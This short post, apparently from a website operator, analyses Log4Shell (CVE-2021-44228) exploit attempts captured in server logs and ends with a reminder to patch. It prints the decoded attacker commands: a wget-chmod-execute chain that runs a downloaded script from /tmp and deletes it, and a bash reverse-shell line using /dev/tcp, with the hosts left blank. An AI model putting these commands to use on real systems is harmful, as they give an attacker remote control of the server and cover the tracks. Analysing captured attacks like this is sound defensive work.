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Log4Shell Exploit Attempts

Bad guys continue to attempt to exploit the vulnerability in log4j known as Log4Shell. CVE-2021-44228.

I have captured the http requests below in web server logs on this site and others:


If the web server was vulnerable, it would execute the base64 encoded commands. What do these decode to?

wget -nc -q -P /tmp/; chmod 777 /tmp/a.sh; /tmp/a.sh; rm -rf /tmp/*.sh

These commands will connect to the c&c server, download the file a.sh, execute and then remove any evidence.

I have downloaded the a.sh file, this contains further commands:

nohup bash -c '0<&183-;exec 183<>/dev/tcp/;sh <&183 >&183 2>&183' &1 &

This is an attempt to set up a reverse shell back to the attacker.

Patch your stuff!